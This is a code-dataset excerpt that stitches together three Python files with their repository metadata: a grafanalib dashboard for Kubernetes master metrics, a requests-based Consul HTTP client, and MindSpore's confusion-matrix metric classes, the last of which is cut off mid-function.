d.simple_graph(
"Watch event avg size",
d.one_line(
"""
sum(
rate(
apiserver_watch_events_sizes_sum{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
/
rate(
apiserver_watch_events_sizes_count{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
) by (instance, group, version, kind)"""
),
legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
),
d.simple_graph(
"Inflight requests",
"sum(apiserver_current_inflight_requests) by (requestKind, instance)",
legend="{{instance}}: {{requestKind}}",
),
d.simple_graph(
"Request rate",
d.one_line(
"""
sum(
rate(
apiserver_request_total{
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}[1m]
)
) by (verb, resource, subresource, instance)"""
),
# TODO(github.com/grafana/grafana/issues/19410): uncomment once fixed
# legend="{{instance}}: {{verb}} {{resource}}",
),
d.simple_graph(
"Request rate by code",
"sum(rate(apiserver_request_total[1m])) by (code, instance)",
legend="{{instance}}: {{code}}",
),
d.simple_graph(
"Request latency (50th percentile) (excl. WATCH)",
d.one_line(
"""
apiserver:apiserver_request_latency:histogram_quantile{
quantile="0.50",
verb!="WATCH",
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}"""
),
# TODO(github.com/grafana/grafana/issues/19410): uncomment once fixed
# legend="{{verb}} {{scope}}/{{resource}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Request latency (99th percentile) (excl. WATCH)",
d.one_line(
"""
apiserver:apiserver_request_latency:histogram_quantile{
quantile="0.99",
verb!="WATCH",
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}"""
),
# TODO(github.com/grafana/grafana/issues/19410): uncomment once fixed
# legend="{{verb}} {{scope}}/{{resource}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Traffic (excl. WATCH)",
d.one_line(
"""
sum(
rate(
apiserver_response_sizes_sum{
verb!="WATCH",
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}[1m]
)
) by (verb, version, resource, subresource, scope, instance)"""
),
yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
),
d.simple_graph(
"Webhook admission duration (99th percentile)",
"histogram_quantile(0.99, sum(rate(apiserver_admission_webhook_admission_duration_seconds_bucket[1m])) by (le, type, name))",
legend="{{type}}: {{name}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Request filter latency for each filter type (99th percentile)",
"histogram_quantile(0.99, sum(rate(apiserver_request_filter_duration_seconds_bucket[1m])) by (le, filter))",
legend="{{filter}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
]
VM_PANELS = [
d.simple_graph(
"fs bytes reads by container",
"sum(rate(container_fs_reads_bytes_total[1m])) by (container, instance)",
legend="{{instance}}: {{container}}",
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
d.simple_graph(
"fs reads by container",
"sum(rate(container_fs_reads_total[1m])) by (container, instance)",
legend="{{instance}}: {{container}}",
),
d.simple_graph(
"fs bytes writes by container",
"sum(rate(container_fs_writes_bytes_total[1m])) by (container, instance)",
legend="{{instance}}: {{container}}",
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
d.simple_graph(
"fs writes by container",
"sum(rate(container_fs_writes_total[1m])) by (container, instance)",
legend="{{instance}}: {{container}}",
),
d.Graph(
title="CPU usage by container",
targets=[
d.Target(
expr='sum(rate(container_cpu_usage_seconds_total{container!=""}[1m])) by (container, instance)',
legendFormat="{{instance}}: {{container}}",
),
d.Target(expr="machine_cpu_cores", legendFormat="limit"),
],
),
d.Graph(
title="memory usage by container",
targets=[
d.Target(
expr='sum(container_memory_usage_bytes{container!=""}) by (container, instance)',
legendFormat="{{instance}}: {{container}}",
),
d.Target(expr="machine_memory_bytes", legendFormat="limit"),
],
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
d.Graph(
title="memory working set by container",
targets=[
d.Target(
expr='sum(container_memory_working_set_bytes{container!=""}) by (container, instance)',
legendFormat="{{instance}}: {{container}}",
),
d.Target(expr="machine_memory_bytes", legendFormat="limit"),
],
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
d.Graph(
title="Network usage (bytes)",
targets=[
g.Target(
expr='rate(container_network_transmit_bytes_total{id="/"}[1m])',
legendFormat="{{instance}} transmit",
),
g.Target(
expr='rate(container_network_receive_bytes_total{id="/"}[1m])',
legendFormat="{{instance}} receive",
),
],
yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
),
d.Graph(
title="Network usage (packets)",
targets=[
g.Target(
expr='rate(container_network_transmit_packets_total{id="/"}[1m])',
legendFormat="{{instance}} transmit",
),
g.Target(
expr='rate(container_network_receive_packets_total{id="/"}[1m])',
legendFormat="{{instance}} receive",
),
],
),
d.Graph(
title="Network usage (avg packet size)",
targets=[
g.Target(
expr='rate(container_network_transmit_bytes_total{id="/"}[1m]) / rate(container_network_transmit_packets_total{id="/"}[1m])',
legendFormat="{{instance}} transmit",
),
g.Target(
expr='rate(container_network_receive_bytes_total{id="/"}[1m]) / rate(container_network_receive_packets_total{id="/"}[1m])',
legendFormat="{{instance}} receive",
),
],
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
d.Graph(
title="Network tcp segments",
targets=[
g.Target(
expr="sum(rate(node_netstat_Tcp_InSegs[1m])) by (instance)",
legendFormat="InSegs {{instance}}",
),
g.Target(
expr="sum(rate(node_netstat_Tcp_OutSegs[1m])) by (instance)",
legendFormat="OutSegs {{instance}}",
),
g.Target(
expr="sum(rate(node_netstat_Tcp_RetransSegs[1m])) by (instance)",
legendFormat="RetransSegs {{instance}}",
),
],
yAxes=g.single_y_axis(format=g.SHORT_FORMAT, logBase=10),
),
]
# The final dashboard must be named 'dashboard' so that grafanalib will find it.
dashboard = d.Dashboard(
title="Master dashboard",
refresh="",
rows=[
d.Row(title="API call latency", panels=API_CALL_LATENCY_PANELS),
d.Row(title="API call latency aggregated with quantile", panels=QUANTILE_API_CALL_LATENCY_PANELS, collapse=True),
d.Row(title="P&F metrics", panels=PAF_PANELS, collapse=True),
d.Row(title="Overall cluster health", panels=HEALTH_PANELS, collapse=True),
d.Row(title="etcd", panels=ETCD_PANELS, collapse=True),
d.Row(title="kube-apiserver", panels=APISERVER_PANELS, collapse=True),
d.Row(
title="kube-controller-manager",
panels=[
d.simple_graph(
"Workqueue depths",
'workqueue_depth{endpoint="kube-controller-manager"}',
legend="{{name}}",
)
],
collapse=True,
),
d.Row(title="Master VM", panels=VM_PANELS, collapse=True),
],
templating=g.Templating(
list=[
d.SOURCE_TEMPLATE,
g.Template(
name="etcd_type",
type="query",
dataSource="$source",
regex=r"\*\[+\]+(.*)",
query="label_values(etcd_request_duration_seconds_count, type)",
multi=True,
includeAll=True,
refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
),
g.Template(
name="etcd_operation",
type="query",
dataSource="$source",
query="label_values(etcd_request_duration_seconds_count, operation)",
multi=True,
includeAll=True,
refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
),
g.Template(
name="verb",
type="query",
dataSource="$source",
query="label_values(apiserver_request_duration_seconds_count, verb)",
multi=True,
includeAll=True,
refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
),
g.Template(
name="resource",
type="query",
dataSource="$source",
regex="(.*)s",
query="label_values(apiserver_request_duration_seconds_count, resource)",
multi=True,
includeAll=True,
refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
),
]
),
).auto_panel_ids()
| true
| true
|
f705987652a631c2ebaab205528fe807cc950ac0
| 2,496
|
py
|
Python
|
consul/std.py
|
DataDog/python-consul
|
104c8c4fd6a0aa8ec24dd0fe911af815672602ca
|
[
"MIT"
] | null | null | null |
consul/std.py
|
DataDog/python-consul
|
104c8c4fd6a0aa8ec24dd0fe911af815672602ca
|
[
"MIT"
] | 1
|
2021-01-05T14:46:32.000Z
|
2021-01-05T14:46:32.000Z
|
consul/std.py
|
DataDog/python-consul
|
104c8c4fd6a0aa8ec24dd0fe911af815672602ca
|
[
"MIT"
] | null | null | null |
import requests
import os
from consul import base
__all__ = ["Consul"]
class HTTPClient(base.HTTPClient):
    """Blocking Consul HTTP transport built on a pooled ``requests`` session.

    When ``check_pid`` is enabled, the session is replaced after a ``fork``
    so a child process never reuses the parent's pooled connections.
    """

    def __init__(self, *args, **kwargs):
        self.timeout = kwargs.pop("timeout", None)
        super(HTTPClient, self).__init__(*args, **kwargs)
        self.session = requests.session()
        self._pid = os.getpid()

    def response(self, response):
        """Adapt a ``requests`` response into a ``base.Response`` triple."""
        response.encoding = "utf-8"
        return base.Response(response.status_code, response.headers, response.text)

    def _request(self, callback, uri, method, data, timeout=None):
        """Issue one HTTP request and feed the wrapped response to *callback*."""
        # Fork detection must run before the session object is touched.
        self._renew_session_on_pid_change()
        if timeout is None:
            # Fall back to the client-wide timeout (left as-is, even if <= 0).
            effective = self.timeout
        elif timeout <= 0:
            # A non-positive per-call timeout means "wait forever".
            effective = None
        else:
            effective = timeout
        raw = self.session.request(
            method,
            url=uri,
            verify=self.verify,
            data=data,
            cert=self.cert,
            timeout=effective,
        )
        return callback(self.response(raw))

    def get(self, callback, path, params=None, timeout=None):
        """HTTP GET against *path* with optional query *params*."""
        return self._request(
            callback, uri=self.uri(path, params), method="GET", data=None, timeout=timeout
        )

    def put(self, callback, path, params=None, data="", timeout=None):
        """HTTP PUT against *path* with body *data*."""
        return self._request(
            callback, uri=self.uri(path, params), method="PUT", data=data, timeout=timeout
        )

    def delete(self, callback, path, params=None, timeout=None):
        """HTTP DELETE against *path*."""
        return self._request(
            callback, uri=self.uri(path, params), method="DELETE", data=None, timeout=timeout
        )

    def post(self, callback, path, params=None, data="", timeout=None):
        """HTTP POST against *path* with body *data*."""
        return self._request(
            callback, uri=self.uri(path, params), method="POST", data=data, timeout=timeout
        )

    def _renew_session_on_pid_change(self):
        """Re-create the session if os.getpid() differs from the recorded pid."""
        if not self.check_pid:
            return
        current = os.getpid()
        if current != self._pid:
            self._pid = current
            self.session = requests.session()
class Consul(base.Consul):
    """Consul client wired to the blocking ``requests``-based transport."""

    def connect(
        self, host, port, scheme, verify=True, cert=None, timeout=None, check_pid=False
    ):
        """Build the :class:`HTTPClient` that carries all HTTP traffic."""
        return HTTPClient(
            host, port, scheme, verify, cert, timeout=timeout, check_pid=check_pid
        )
| 30.814815
| 87
| 0.567708
|
import requests
import os
from consul import base
__all__ = ["Consul"]
class HTTPClient(base.HTTPClient):
    """Blocking Consul HTTP transport backed by a pooled ``requests`` session.

    When ``check_pid`` is set, a new session is created after a ``fork`` so
    a child process never reuses the parent's pooled connections.
    """
    def __init__(self, *args, **kwargs):
        # Client-wide default timeout; per-call timeouts can override it.
        self.timeout = kwargs.pop("timeout", None)
        super(HTTPClient, self).__init__(*args, **kwargs)
        self.session = requests.session()
        # Remember which process created the session (for fork detection).
        self._pid = os.getpid()
    def response(self, response):
        """Adapt a ``requests`` response into a ``base.Response`` triple."""
        response.encoding = "utf-8"
        return base.Response(response.status_code, response.headers, response.text)
    def _request(self, callback, uri, method, data, timeout=None):
        """Issue one HTTP request and feed the wrapped response to *callback*.

        A ``timeout`` of None falls back to the client default; a
        non-positive value means "wait forever".
        """
        self._renew_session_on_pid_change()
        if timeout is None:
            timeout = self.timeout
        elif timeout <= 0:
            timeout = None
        return callback(
            self.response(
                self.session.request(
                    method,
                    url=uri,
                    verify=self.verify,
                    data=data,
                    cert=self.cert,
                    timeout=timeout,
                )
            )
        )
    def get(self, callback, path, params=None, timeout=None):
        """HTTP GET against *path* with optional query *params*."""
        uri = self.uri(path, params)
        return self._request(
            callback, uri=uri, method="GET", data=None, timeout=timeout
        )
    def put(self, callback, path, params=None, data="", timeout=None):
        """HTTP PUT against *path* with body *data*."""
        uri = self.uri(path, params)
        return self._request(
            callback, uri=uri, method="PUT", data=data, timeout=timeout
        )
    def delete(self, callback, path, params=None, timeout=None):
        """HTTP DELETE against *path*."""
        uri = self.uri(path, params)
        return self._request(
            callback, uri=uri, method="DELETE", data=None, timeout=timeout
        )
    def post(self, callback, path, params=None, data="", timeout=None):
        """HTTP POST against *path* with body *data*."""
        uri = self.uri(path, params)
        return self._request(
            callback, uri=uri, method="POST", data=data, timeout=timeout
        )
    def _renew_session_on_pid_change(self):
        """Check if the pid has changed and create a new session if it has."""
        if self.check_pid:
            pid = os.getpid()
            if pid == self._pid:
                return
            self._pid = pid
            self.session = requests.session()
class Consul(base.Consul):
    """Consul client wired to the blocking ``requests``-based transport."""
    def connect(
        self, host, port, scheme, verify=True, cert=None, timeout=None, check_pid=False
    ):
        """Build the HTTPClient instance used for all HTTP traffic."""
        return HTTPClient(
            host, port, scheme, verify, cert, timeout=timeout, check_pid=check_pid
        )
| true
| true
|
f7059973a4d9a361ba270c09265b9b2266bf6ff4
| 27,261
|
py
|
Python
|
mindspore/nn/metrics/confusion_matrix.py
|
kungfu-team/mindspore-bert
|
71501cf52ae01db9d6a73fb64bcfe68a6509dc32
|
[
"Apache-2.0"
] | null | null | null |
mindspore/nn/metrics/confusion_matrix.py
|
kungfu-team/mindspore-bert
|
71501cf52ae01db9d6a73fb64bcfe68a6509dc32
|
[
"Apache-2.0"
] | null | null | null |
mindspore/nn/metrics/confusion_matrix.py
|
kungfu-team/mindspore-bert
|
71501cf52ae01db9d6a73fb64bcfe68a6509dc32
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""ConfusionMatrixMetric & ConfusionMatrix."""
import numpy as np
from mindspore._checkparam import Validator as validator
from .metric import Metric
class ConfusionMatrix(Metric):
    r"""
    Computes the confusion matrix of a binary or multi-class classification
    model as a num_classes x num_classes array.

    If you only want the raw confusion matrix, use this class. For derived
    measures ('PPV', 'TPR', 'TNR', ...) use ConfusionMatrixMetric instead.

    Args:
        num_classes (int): Number of classes in the dataset.
        normalize (str): Normalization mode, one of:

            - **'no_norm'** (None) - No normalization is used. Default: None.
            - **'target'** (str) - Normalization based on target value.
            - **'prediction'** (str) - Normalization based on predicted value.
            - **'all'** (str) - Normalization over the whole matrix.

        threshold (float): A threshold, which is used to compare with the input tensor. Default: 0.5.

    Examples:
        >>> x = Tensor(np.array([1, 0, 1, 0]))
        >>> y = Tensor(np.array([1, 0, 0, 1]))
        >>> metric = nn.ConfusionMatrix(num_classes=2, normalize="no_norm", threshold=0.5)
        >>> metric.clear()
        >>> metric.update(x, y)
        >>> output = metric.eval()
        >>> print(output)
        [[1. 1.]
         [1. 1.]]
    """

    TARGET = "target"
    PREDICTION = "prediction"
    ALL = "all"
    NO_NORM = "no_norm"

    def __init__(self, num_classes, normalize=NO_NORM, threshold=0.5):
        super(ConfusionMatrix, self).__init__()
        self.num_classes = validator.check_value_type("num_classes", num_classes, [int])
        # Membership test replaces the original chained comparison, which
        # mixed `!=` with an identity check (`is not`) on strings — identity
        # comparison of strings only works by accident of interning.
        if normalize not in (ConfusionMatrix.TARGET, ConfusionMatrix.PREDICTION,
                             ConfusionMatrix.ALL, ConfusionMatrix.NO_NORM):
            raise ValueError(
                'The normalize way should be in [all, prediction, label, None], but got {}.'.format(normalize)
            )
        self.normalize = normalize
        self.threshold = validator.check_value_type("threshold", threshold, [float])
        self.clear()

    def clear(self):
        """Clears the internal evaluation result."""
        self.confusion_matrix = np.zeros((self.num_classes, self.num_classes))
        self._is_update = False

    def update(self, *inputs):
        """
        Update state with y_pred and y.

        Args:
            inputs: Input `y_pred` and `y`. `y_pred` and `y` are a `Tensor`, a list or an array.
                `y_pred` is the predicted value, `y` is the true value.
                The shape of `y_pred` is :math:`(N, C, ...)` or :math:`(N, ...)`.
                The shape of `y` is :math:`(N, ...)`.

        Raises:
            ValueError: If the number of the inputs is not 2.
        """
        if len(inputs) != 2:
            raise ValueError('ConfusionMatrix need 2 inputs (y_pred, y), but got {}.'.format(len(inputs)))
        y_pred = self._convert_data(inputs[0])
        y = self._convert_data(inputs[1])
        if not (y_pred.ndim == y.ndim or y_pred.ndim == y.ndim + 1):
            raise ValueError("y_pred and y should have the same number of dimensions, or the dimension of y_pred "
                             "equals the dimension of y add 1.")
        # Extra class axis (logits/probabilities): collapse via argmax.
        if y_pred.ndim == y.ndim + 1:
            y_pred = np.argmax(y_pred, axis=1)
        # Floating-point scores at the same rank as y: binarize by threshold.
        if y_pred.ndim == y.ndim and y_pred.dtype in (np.float16, np.float32, np.float64):
            y_pred = (y_pred >= self.threshold).astype(int)
        # Encode each (true, pred) pair as a single index and histogram them.
        trans = (y.reshape(-1) * self.num_classes + y_pred.reshape(-1)).astype(int)
        bincount = np.bincount(trans, minlength=self.num_classes ** 2)
        confusion_matrix = bincount.reshape(self.num_classes, self.num_classes)
        self.confusion_matrix += confusion_matrix
        self._is_update = True

    def eval(self):
        """
        Computes confusion matrix.

        Returns:
            numpy.ndarray, the computed result.

        Raises:
            RuntimeError: If update was never called before eval.
        """
        if not self._is_update:
            raise RuntimeError('Call the update method before calling eval.')
        confusion_matrix = self.confusion_matrix.astype(float)
        matrix_target = confusion_matrix / confusion_matrix.sum(axis=1, keepdims=True)
        matrix_pred = confusion_matrix / confusion_matrix.sum(axis=0, keepdims=True)
        matrix_all = confusion_matrix / confusion_matrix.sum()
        normalize_dict = {ConfusionMatrix.TARGET: matrix_target,
                          ConfusionMatrix.PREDICTION: matrix_pred,
                          ConfusionMatrix.ALL: matrix_all}
        if self.normalize == ConfusionMatrix.NO_NORM:
            return confusion_matrix
        matrix = normalize_dict.get(self.normalize)
        # Zero-sum rows/columns divide to NaN; report those cells as 0.
        if matrix[np.isnan(matrix)].size != 0:
            matrix[np.isnan(matrix)] = 0
        return matrix
class ConfusionMatrixMetric(Metric):
    r"""
    Metric derived from the confusion matrix of a binary or multi-class model.

    Depending on ``calculation_method``, either the metric is computed per
    sample and averaged across updates, or raw TP/FP/TN/FN counts are
    accumulated over all updates and the metric is computed once in eval().
    For the raw confusion matrix itself, use ConfusionMatrix instead.

    Args:
        skip_channel (bool): Whether to skip the measurement calculation on the
            first channel of the predicted output. Default: True.
        metric_name (str): Metric to report; common aliases are accepted.
            Choose from: ["sensitivity", "specificity", "precision",
            "negative predictive value", "miss rate", "fall out",
            "false discovery rate", "false omission rate",
            "prevalence threshold", "threat score", "accuracy",
            "balanced accuracy", "f1 score",
            "matthews correlation coefficient", "fowlkes mallows index",
            "informedness", "markedness"].
        calculation_method (bool): If True, measure each sample first and
            average; if False, accumulate one confusion matrix over all
            samples. For classification tasks this should be False.
            Default: False.
        decrease (str): Reduction mode for one batch of data; only used when
            calculation_method is True. Choose from: ["none", "mean", "sum",
            "mean_batch", "sum_batch", "mean_channel", "sum_channel"].
            Default: "mean".

    Examples:
        >>> metric = ConfusionMatrixMetric(skip_channel=True, metric_name="tpr",
        ...                                calculation_method=False, decrease="mean")
        >>> metric.clear()
        >>> metric.update(Tensor(np.array([[[0], [1]], [[1], [0]]])),
        ...               Tensor(np.array([[[0], [1]], [[0], [1]]])))
        >>> print(metric.eval())
        [0.5]
    """

    def __init__(self,
                 skip_channel=True,
                 metric_name="sensitivity",
                 calculation_method=False,
                 decrease="mean"):
        super(ConfusionMatrixMetric, self).__init__()
        self.confusion_matrix = _ConfusionMatrix(skip_channel=skip_channel, metric_name=metric_name,
                                                 calculation_method=calculation_method, decrease=decrease)
        self.skip_channel = validator.check_value_type("skip_channel", skip_channel, [bool])
        self.calculation_method = validator.check_value_type("calculation_method", calculation_method, [bool])
        self.metric_name = validator.check_value_type("metric_name", metric_name, [str])
        valid_decreases = ["none", "mean", "sum", "mean_batch", "sum_batch", "mean_channel", "sum_channel"]
        decrease = validator.check_value_type("decrease", decrease, [str])
        self.decrease = validator.check_string(decrease, valid_decreases, "decrease")
        self.clear()

    def clear(self):
        """Clears the internal evaluation result."""
        self._total_num = 0
        self._class_num = 0
        self._total_tp = 0.0
        self._total_fp = 0.0
        self._total_tn = 0.0
        self._total_fn = 0.0

    def update(self, *inputs):
        """
        Accumulate one batch of predictions and targets.

        inputs: exactly two array-likes, `y_pred` (one-hot, batch-first,
        shape (N, C, ...)) and `y` (one-hot, batch-first, shape (N, C, ...)).

        Raises:
            ValueError: If the number of the inputs is not 2.
        """
        if len(inputs) != 2:
            raise ValueError('ConfusionMatrixMetric need 2 inputs (y_pred, y), but got {}.'.format(len(inputs)))
        y_pred = self._convert_data(inputs[0])
        y = self._convert_data(inputs[1])
        if self.calculation_method is True:
            # Per-sample path: keep a weighted running mean of the scores,
            # weighting each batch by its count of valid (non-NaN) entries.
            score, not_nans = self.confusion_matrix(y_pred, y)
            valid = int(not_nans.item())
            self._total_num += score.item() * valid
            self._class_num += valid
        else:
            # Global path: fold this batch's TP/FP/TN/FN into running totals.
            matrix = self.confusion_matrix(y_pred, y)
            matrix, _ = _decrease_metric(matrix, "sum")
            self._total_tp += matrix[0].item()
            self._total_fp += matrix[1].item()
            self._total_tn += matrix[2].item()
            self._total_fn += matrix[3].item()

    def eval(self):
        """
        Compute the configured confusion-matrix metric.

        Returns:
            ndarray, the computed result.

        Raises:
            RuntimeError: If no examples were accumulated in per-sample mode.
        """
        if self.calculation_method is True:
            if self._class_num == 0:
                raise RuntimeError("ConfusionMatrixMetric must have at least one example before it can be computed.")
            return self._total_num / self._class_num
        counts = np.array([self._total_tp, self._total_fp, self._total_tn, self._total_fn])
        return _compute_confusion_matrix_metric(self.metric_name, counts)
class _ConfusionMatrix:
    """
    Compute confusion matrix related metrics.

    Args:
        skip_channel (bool): Whether to skip the measurement calculation on the first channel of the
            predicted output. Default: True.
        metric_name (str or sequence of str): Metric name(s) or common aliases.
        calculation_method (bool): If True, compute the named metric per sample and reduce it.
            If False, return the raw per-image confusion matrix from '_get_confusion_matrix'
            (callers then reduce it themselves via '_compute_confusion_matrix_metric').
            Default: False.
        decrease (str): Reduction mode for one batch; used only when calculation_method is True.
            One of ["none", "mean", "sum", "mean_batch", "sum_batch", "mean_channel", "sum_channel"].
            Default: "mean".
    """

    def __init__(self, skip_channel=True, metric_name="hit_rate", calculation_method=False,
                 decrease="mean"):
        super().__init__()
        self.skip_channel = skip_channel
        self.metric_name = metric_name
        self.calculation_method = calculation_method
        self.decrease = decrease

    def __call__(self, y_pred, y):
        """
        Compute the confusion matrix (or reduced metric) for one batch.

        'y_pred' is expected to hold binarized predictions and 'y' must be in one-hot
        format, with batch as the first dimension of both.

        Raises:
            ValueError: If y is not binarized, y_pred has fewer than two dimensions,
                or metric_name is an empty sequence.
        """
        if not np.all(y.astype(np.uint8) == y):
            raise ValueError("y should be a binarized ndarray.")
        dims = y_pred.ndim
        if dims < 2:
            raise ValueError("y_pred should have at least two dimensions.")
        # NOTE(review): for 2-D ([B, N]) or trivially 3-D ([B, N, 1]) input the
        # per-sample path is permanently disabled on this instance — a lasting
        # side effect of calling with such shapes. Confirm this is intended.
        if dims == 2 or (dims == 3 and y_pred.shape[-1] == 1):
            if self.calculation_method:
                self.calculation_method = False
        confusion_matrix = _get_confusion_matrix(y_pred=y_pred, y=y, skip_channel=self.skip_channel)
        if self.calculation_method:
            if isinstance(self.metric_name, str):
                confusion_matrix = _compute_confusion_matrix_metric(self.metric_name, confusion_matrix)
                chart, not_nans = _decrease_metric(confusion_matrix, self.decrease)
                return chart, not_nans
            if not self.metric_name:
                raise ValueError("There should be at least one metric name.")
            results = []
            # A sequence of names yields a flat alternating list:
            # [chart_0, not_nans_0, chart_1, not_nans_1, ...].
            for metric_name in self.metric_name:
                sub_confusion_matrix = _compute_confusion_matrix_metric(metric_name, confusion_matrix)
                chart, not_nans = _decrease_metric(sub_confusion_matrix, self.decrease)
                results.append(chart)
                results.append(not_nans)
            return results
        return confusion_matrix
def _get_confusion_matrix(y_pred, y, skip_channel=True):
    """
    Compute per-sample, per-channel confusion counts.

    Returns an array of shape [B, C, 4] whose last axis holds
    [TP, FP, TN, FN], where B is the batch size and C the number of
    channels (classes) after optional first-channel removal.

    Args:
        y_pred (ndarray): input data to compute. It must be one-hot format and first dim is batch.
            The values should be binarized.
        y (ndarray): ground truth to compute the metric. It must be one-hot format and first dim is batch.
            The values should be binarized.
        skip_channel (bool): whether to skip metric computation on the first channel of the predicted output.
            Default: True.

    Raises:
        ValueError: when `y_pred` and `y` have different shapes.
    """
    # NOTE(review): the condition looks inverted relative to the parameter
    # name — the first channel is dropped only when skip_channel is False.
    # This likely stems from MONAI's `include_background` flag being renamed
    # without flipping the test; confirm intent before changing behavior.
    if not skip_channel:
        y = y[:, 1:] if y.shape[1] > 1 else y
        y_pred = y_pred[:, 1:] if y_pred.shape[1] > 1 else y_pred
    y = y.astype(float)
    y_pred = y_pred.astype(float)
    validator.check('y_shape', y.shape, 'y_pred_shape', y_pred.shape)
    batch_size, n_class = y_pred.shape[:2]
    # Flatten all trailing (spatial) dims so counts are taken per (sample, class).
    y_pred = y_pred.reshape(batch_size, n_class, -1)
    y = y.reshape(batch_size, n_class, -1)
    # pred + truth == 2 only where both are 1 (TP); == 0 only where both are 0 (TN).
    tp = ((y_pred + y) == 2).astype(float)
    tn = ((y_pred + y) == 0).astype(float)
    tp = tp.sum(axis=2)
    tn = tn.sum(axis=2)
    p = y.sum(axis=2)
    n = y.shape[-1] - p
    fn = p - tp
    fp = n - tn
    return np.stack([tp, fp, tn, fn], axis=-1)
def _decrease_mean(not_nans, chart):
not_nans = not_nans.sum(axis=1)
chart = np.where(not_nans > 0, chart.sum(axis=1) / not_nans, np.zeros(1, dtype=float))
not_nans = (not_nans > 0).astype(float).sum(axis=0)
chart = np.where(not_nans > 0, chart.sum(axis=0) / not_nans, np.zeros(1, dtype=float))
return not_nans, chart
def _decrease_sum(not_nans, chart):
not_nans = not_nans.sum(axis=(0, 1))
chart = np.sum(chart, axis=(0, 1))
return not_nans, chart
def _decrease_mean_batch(not_nans, chart):
not_nans = not_nans.sum(axis=0)
chart = np.where(not_nans > 0, chart.sum(axis=0) / not_nans, np.zeros(1, dtype=float))
return not_nans, chart
def _decrease_sum_batch(not_nans, chart):
not_nans = not_nans.sum(axis=0)
chart = chart.sum(axis=0)
return not_nans, chart
def _decrease_mean_channel(not_nans, chart):
not_nans = not_nans.sum(axis=1)
chart = np.where(not_nans > 0, chart.sum(axis=1) / not_nans, np.zeros(1, dtype=float))
return not_nans, chart
def _decrease_sum_channel(not_nans, chart):
not_nans = not_nans.sum(axis=1)
chart = chart.sum(axis=1)
return not_nans, chart
def _decrease_none(not_nans, chart):
return not_nans, chart
def _decrease_metric(chart, decrease="mean"):
    """
    Reduce per-batch/per-class metric scores, ignoring NaN entries.

    Args:
        chart (ndarray): Metric scores whose first two dims are batch and class.
            NaN entries are zeroed in place and excluded from mean reductions.
        decrease (str): Reduction mode: "mean", "sum", "mean_batch", "sum_batch",
            "mean_channel", "sum_channel" or "none". Default: "mean".

    Returns:
        tuple: (reduced chart, count of non-NaN entries per reduced cell).
    """
    nans = np.isnan(chart)
    not_nans = (~nans).astype(float)
    chart[nans] = 0
    # Dispatch table of reduction functions; only the selected one is called.
    # The previous implementation eagerly evaluated every reduction and left
    # "mean_batch" mapped to the uncalled function object, which made
    # decrease="mean_batch" fail on tuple unpacking.
    decrease_dict = {"mean": _decrease_mean,
                     "sum": _decrease_sum,
                     "mean_batch": _decrease_mean_batch,
                     "sum_batch": _decrease_sum_batch,
                     "mean_channel": _decrease_mean_channel,
                     "sum_channel": _decrease_sum_channel,
                     "none": _decrease_none}
    not_nans, chart = decrease_dict.get(decrease)(not_nans, chart)
    return chart, not_nans
def _calculate_tpr(tp, p):
"""Calculate tpr."""
return tp, p
def _calculate_tnr(tn, n):
"""Calculate tnr."""
return tn, n
def _calculate_ppv(tp, fp):
"""Calculate ppv."""
return tp, (tp + fp)
def _calculate_npv(tn, fn):
"""Calculate npv."""
return tn, (tn + fn)
def _calculate_fnr(fn, p):
"""Calculate fnr."""
return fn, p
def _calculate_fpr(fp, n):
"""Calculate fpr."""
return fp, n
def _calculate_fdr(tp, fp):
"""Calculate fdr."""
return fp, (fp + tp)
def _calculate_for(tn, fn):
"""Calculate for."""
return fn, (fn + tn)
def _calculate_pt(tp, tn, p, n):
"""Calculate pt."""
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
tnr = np.where(n > 0, tn / n, np.array(float("nan")))
numerator = np.sqrt(tpr * (1.0 - tnr)) + tnr - 1.0
denominator = tpr + tnr - 1.0
return numerator, denominator
def _calculate_ts(tp, fp, fn):
"""Calculate ts."""
return tp, (tp + fn + fp)
def _calculate_acc(tp, tn, p, n):
"""Calculate acc."""
return (tp + tn), (p + n)
def _calculate_ba(tp, tn, p, n):
"""Calculate ba."""
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
tnr = np.where(n > 0, tn / n, np.array(float("nan")))
numerator, denominator = (tpr + tnr), 2.0
return numerator, denominator
def _calculate_f1(tp, fp, fn):
"""Calculate f1."""
return tp * 2.0, (tp * 2.0 + fn + fp)
def _calculate_mcc(tp, fp, tn, fn):
"""Calculate mcc."""
numerator = tp * tn - fp * fn
denominator = np.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
return numerator, denominator
def _calculate_fm(tp, fp, p):
"""Calculate fm."""
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
ppv = np.where((tp + fp) > 0, tp / (tp + fp), np.array(float("nan")))
